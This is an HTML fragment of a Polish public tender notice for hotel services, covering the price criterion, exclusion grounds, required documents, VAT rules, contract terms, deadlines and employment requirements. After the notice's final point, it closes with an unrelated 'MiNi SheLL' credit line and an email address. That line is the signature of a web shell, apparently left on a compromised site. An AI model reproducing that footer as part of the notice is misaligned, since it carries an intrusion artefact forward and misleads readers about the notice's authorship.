kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wykluczy z postępowania Wykonawców, wobec których zachodzą podstawy wykluczenia, o których mowa w art. 108 ust. 1 ustawy Pzp.<br/>2. Zamawiający działając na podstawie ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2025 r. poz. 514) wykluczy z postępowania Wykonawców, wobec których zachodzą podstawy wykluczenia określone w art. 7 ust. 1 tej ustawy. Na potwierdzenie braku opisanych w art. 7 ustawy podstaw wykluczenia Wykonawca obowiązany jest złożyć wraz z ofertą oświadczenie odpowiadające treścią załącznikowi nr 2 do SWZ.<br/>3. Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenia, potwierdzające brak podstaw wykluczenia. Dokument sporządza się według wzoru stanowiącego załącznik nr 2 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga składania podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga składania przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca składa wraz z ofertą następujące dokumenty i załączniki:<br/>1. formularz ofertowy wypełniony i podpisany przez Wykonawcę zgodnie ze wzorem – załącznik nr 1 do SWZ;<br/>2. oświadczenie stanowiące potwierdzenie, że Wykonawca nie podlega wykluczeniu przygotowany zgodnie ze wzorem – załącznik nr 2 do SWZ;<br/>oświadczenie, stanowiące załącznik nr 2 do SWZ (jeśli dotyczy) składają także odrębnie każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia; w takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>3. formularz cenowy według załącznika nr 3 do SWZ;<br/>4. pełnomocnictwo osób podpisujących ofertę, o ile nie wynika z przepisów prawa lub innych dokumentów (jeśli dotyczy);<br/>5. pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeśli dotyczy).<br/><br/>Zgodnie z art. 18 ust. 3 ustawy Pzp, nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji. Jeżeli wykonawca, nie później niż w terminie składania ofert, w sposób niebudzący wątpliwości zastrzegł, że nie mogą być one udostępniane oraz wykazał, załączając stosowne wyjaśnienia, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Na platformie w formularzu składania oferty znajduje się miejsce wyznaczone do dołączenia części oferty stanowiącej tajemnicę przedsiębiorstwa. Brak jednoznacznego wskazania, które pliki stanowią tajemnicę przedsiębiorstwa pliki spowoduje uznanie ich za niezastrzeżone.<br/>Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po ich<br/>podpisaniu. Może to skutkować naruszeniem integralności plików, co równoznaczne będzie z koniecznością odrzucenia oferty w postępowaniu.<br/>Oferta winna być sporządzona w sposób czytelny (zaleca się sporządzenie oferty na urządzeniu elektronicznym), a pliki składające się na ofertę Wykonawca winien odpowiednio opisać, by ułatwić ich identyfikację.<br/><br/><br/>Pełnomocnictwo winno być udzielone zgodnie z zasadami reprezentacji<br/>obowiązującymi dla mocodawcy i wskazywać osobę pełnomocnika oraz zakres umocowania. Z pełnomocnictwa musi wprost wynikać w szczególności kto jest mocodawcą, komu i kiedy zostaje udzielone pełnomocnictwo i w jakim zakresie.<br/>Pełnomocnictwo powinno zostać złożone w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku gdy zostało ono sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym mocodawcy. Poświadczenia zgodności z oryginałem może dokonać także notariusz w myśl przepisów art. 97 §2 ustawy z dnia 14 lutego 1991 r. Prawo o notariacie.<br/><br/>Jeżeli wybór oferty Wykonawcy prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2024 r. poz. 361 z późn. zm.), dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć.<br/>W takim przypadku Wykonawca obowiązany jest wskazać w ofercie:<br/>1.informację, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>2.nazwy (rodzaje) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>3.wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>4.wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu lub reprezentowania ich w postępowaniu oraz zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. Powyższe dotyczy także wspólników spółki cywilnej chyba, że zakres umocowania wynika z załączonej do oferty umowy spółki lub innych dokumentów.<br/>2. Oświadczenia potwierdzające brak podstaw wykluczenia – załącznik nr 2 do SWZ każdy z Wykonawców składa osobno, w swoim imieniu.<br/>3. Jeżeli oferta Wykonawców, o których mowa w niniejszym rozdziale zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy zawiera załącznik nr 4 do SWZ. <br/><br/>Zamawiający zastrzega, że w przypadku przedłużenia procedury postępowania o zamówienie publiczne prowadzonej w trybie podstawowym z możliwością negocjacji, świadczenie kompleksowej usługi hotelowej zgodnie z przedmiotem umowy rozpocznie się od dnia podpisania umowy, nie wcześniej niż od 01.06.2025 r., z zastrzeżeniem, iż zachowane zostaną pełne okresy w trakcie tygodnia zgodnie z § 1 ust. 2 wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy OpenNexus dostępnej na stronie internetowej przedmiotowego postępowania w zakładce prowadzonego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-08 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-06</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wymaga aby w trakcie realizacji umowy spełniony był warunek określony w postępowaniu, tj. warunek zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących czynności związane z rezerwacją, zakwaterowaniem, sprzątaniem obiektu oraz obsługą gastronomiczną, jeżeli wykonanie tych czynności polega na wykonaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy. Szczegółowy sposób dokumentowania zatrudnienia osób, o których mowa w niniejszym punkcie, uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań, o których mowa w art. 95 ust. 1 ustawy Pzp oraz sankcji z tytułu niespełnienia tych wymagań, rodzaju czynności niezbędnych do realizacji zamówienia, których dotyczą wymagania zatrudnienia na podstawie umowy o pracę przez Wykonawcę zawarto we wzorze umowy stanowiącym załącznik nr 4 do SWZ.<br/>2. Zamawiający nie nakłada obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy/podwykonawcom.<br/>Zamawiający wymaga, aby Wykonawca wskazał w ofercie zadania, których wykonanie zamierza powierzyć podwykonawcom oraz podał (o ile są mu wiadome na tym etapie) nazwy, dane kontaktowe oraz przedstawicieli tych podwykonawców.<br/>3. Oferta, wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty Wykonawca składa bezpośrednio na dokumencie, który następnie przesyła do systemu.<br/>4. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza zobowiązany jest przed podpisaniem umowy złożyć Zamawiającemu wypełnioną deklarację wykonawcy według wzoru stanowiącego załącznik nr 4 do umowy, stanowiący jednocześnie załącznik nr 6 do SWZ, w zakresie m.in. lokalizacji obiektu.<br/>5. Zamawiający zastrzega sobie możliwość odbycia wizji lokalnej przed podpisaniem umowy celem potwierdzenia warunków oferowanych przez Wykonawcę w ofercie. O planowanej wizycie powiadomi Wykonawcę mailowo z co najmniej dwudniowym wyprzedzeniem.

Creat By MiNi SheLL
Email: jattceo@gmail.com